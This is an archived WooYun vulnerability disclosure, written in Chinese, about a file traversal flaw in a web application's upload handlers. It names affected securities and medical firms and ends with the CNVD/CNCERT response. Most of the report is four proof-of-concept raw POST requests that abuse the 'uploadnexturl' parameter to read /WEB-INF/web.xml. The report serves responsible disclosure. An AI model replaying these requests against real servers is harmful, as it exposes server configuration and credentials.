乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-10-12: 细节已通知厂商并且等待厂商处理中 2015-10-16: 厂商已经确认,细节仅向厂商公开 2015-10-19: 细节向第三方安全合作伙伴开放(绿盟科技、唐朝安全巡航) 2015-12-10: 细节向核心白帽子及相关领域专家公开 2015-12-20: 细节向普通白帽子公开 2015-12-30: 细节向实习白帽子公开 2016-01-14: 细节向公众公开
任意文件遍历
部分案例:http://**.**.**.**/index.php?ac=article&at=list&tid=151
浙商证券**.**.**.**/金蝶http://**.**.**.**/开源证券http://**.**.**.**:8000/华西医疗信息服务有限公司**.**.**.**/等
细节决定成败在前人的漏洞里http://**.**.**.**/bugs/wooyun-2010-0108559,发现上传数据包中一个关键参数uploadnexturl,试探下得到漏洞POC金蝶为例
POST http://**.**.**.**/question/attach.upload HTTP/1.1Host: **.**.**.**Connection: keep-aliveContent-Length: 324Cache-Control: max-age=0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Origin: http://**.**.**.**User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.134 Safari/537.36Content-Type: multipart/form-data; boundary=----WebKitFormBoundary0EnErIJoOjA86ai0Referer: http://**.**.**.**/mana/edit/attach_upload.jspAccept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.8Cookie: JSESSIONID=ABFC4E4965C0FCB621D58FD7E1F5BC2D------WebKitFormBoundary0EnErIJoOjA86ai0Content-Disposition: form-data; name="uploadnexturl"/WEB-INF/web.xml------WebKitFormBoundary0EnErIJoOjA86ai0Content-Disposition: form-data; name="src"; filename="1.jpg"Content-Type: application/octet-stream1------WebKitFormBoundary0EnErIJoOjA86ai0--
浙商证券
POST **.**.**.**/question/attach.upload HTTP/1.1Host: **.**.**.**Connection: keep-aliveContent-Length: 307Cache-Control: max-age=0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Origin: **.**.**.**User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.134 Safari/537.36Content-Type: multipart/form-data; boundary=----WebKitFormBoundary0EnErIJoOjA86ai0Referer: Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.8Cookie: ------WebKitFormBoundary0EnErIJoOjA86ai0Content-Disposition: form-data; name="uploadnexturl"/WEB-INF/web.xml------WebKitFormBoundary0EnErIJoOjA86ai0Content-Disposition: form-data; name="src"; filename="1.jpg"Content-Type: application/octet-stream1------WebKitFormBoundary0EnErIJoOjA86ai0--
开源证券
POST http://**.**.**.**:8000/question/attach.upload HTTP/1.1Host: **.**.**.**:8000Connection: keep-aliveContent-Length: 307Cache-Control: max-age=0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Origin: **.**.**.**:8000User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.134 Safari/537.36Content-Type: multipart/form-data; boundary=----WebKitFormBoundary0EnErIJoOjA86ai0Referer: Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.8Cookie: ------WebKitFormBoundary0EnErIJoOjA86ai0Content-Disposition: form-data; name="uploadnexturl"/WEB-INF/web.xml------WebKitFormBoundary0EnErIJoOjA86ai0Content-Disposition: form-data; name="src"; filename="1.jpg"Content-Type: application/octet-stream1------WebKitFormBoundary0EnErIJoOjA86ai0--
华西医疗信息服务有限公司
以上是POC1还有POC2、POC3以及POC4见测试代码POC3演示:
POST http://**.**.**.**/question/mult.upload HTTP/1.1Accept: text/html, application/xhtml+xml, */*Referer: Accept-Language: zh-CNUser-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)Content-Type: multipart/form-data; boundary=---------------------------7df22019904c2Accept-Encoding: gzip, deflateHost: **.**.**.**Content-Length: 692Connection: Keep-AlivePragma: no-cacheCookie: JSESSIONID=-----------------------------7df22019904c2Content-Disposition: form-data; name="uploadnexturl"/WEB-INF/web.xml-----------------------------7df22019904c2Content-Disposition: form-data; name="src"; filename="1.jpg"Content-Type: audio/wav1-----------------------------7df22019904c2Content-Disposition: form-data; name="width"360-----------------------------7df22019904c2Content-Disposition: form-data; name="height"240-----------------------------7df22019904c2Content-Disposition: form-data; name="insert"0-----------------------------7df22019904c2Content-Disposition: form-data; name="Submitdata"ȷ -----------------------------7df22019904c2--
POC2演示:
POST http://**.**.**.**:8000/question/image.upload HTTP/1.1Accept: text/html, application/xhtml+xml, */*Referer: Accept-Language: zh-CNUser-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)Content-Type: multipart/form-data; boundary=---------------------------7df25820904c2Accept-Encoding: gzip, deflateHost: **.**.**.**:8000Content-Length: 874Connection: Keep-AlivePragma: no-cacheCookie: JSESSIONID=-----------------------------7df25820904c2Content-Disposition: form-data; name="uploadnexturl"/WEB-INF/web.xml-----------------------------7df25820904c2Content-Disposition: form-data; name="src"; filename="1.jpg"Content-Type: image/pjpeg1-----------------------------7df25820904c2Content-Disposition: form-data; name="Submitdata"ȷ -----------------------------7df25820904c2Content-Disposition: form-data; name="alt"-----------------------------7df25820904c2Content-Disposition: form-data; name="align"-----------------------------7df25820904c2Content-Disposition: form-data; name="border"-----------------------------7df25820904c2Content-Disposition: form-data; name="hspace"-----------------------------7df25820904c2Content-Disposition: form-data; name="vspace"-----------------------------7df25820904c2--
POC4演示:
POST **.**.**.**/question/flash.upload HTTP/1.1Accept: text/html, application/xhtml+xml, */*Referer: Accept-Language: zh-CNUser-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)Content-Type: multipart/form-data; boundary=---------------------------7df2272a904c2Accept-Encoding: gzip, deflateHost: **.**.**.**Content-Length: 712Connection: Keep-AlivePragma: no-cacheCookie: JSESSIONID=-----------------------------7df2272a904c2Content-Disposition: form-data; name="uploadnexturl"/WEB-INF/web.xml-----------------------------7df2272a904c2Content-Disposition: form-data; name="src"; filename="1.jpg"Content-Type: application/x-shockwave-flash1-----------------------------7df2272a904c2Content-Disposition: form-data; name="width"360-----------------------------7df2272a904c2Content-Disposition: form-data; name="height"240-----------------------------7df2272a904c2Content-Disposition: form-data; name="insert"0-----------------------------7df2272a904c2Content-Disposition: form-data; name="Submitdata"ȷ -----------------------------7df2272a904c2--
过滤
危害等级:高
漏洞Rank:11
确认时间:2015-10-16 15:42
CNVD确认并复现所述情况,已经转由CNCERT通过软件生产厂商公开联系渠道向其邮件通报,并向证券业信息化主管部门通报,由其后续协调网站管理单位处置。
暂无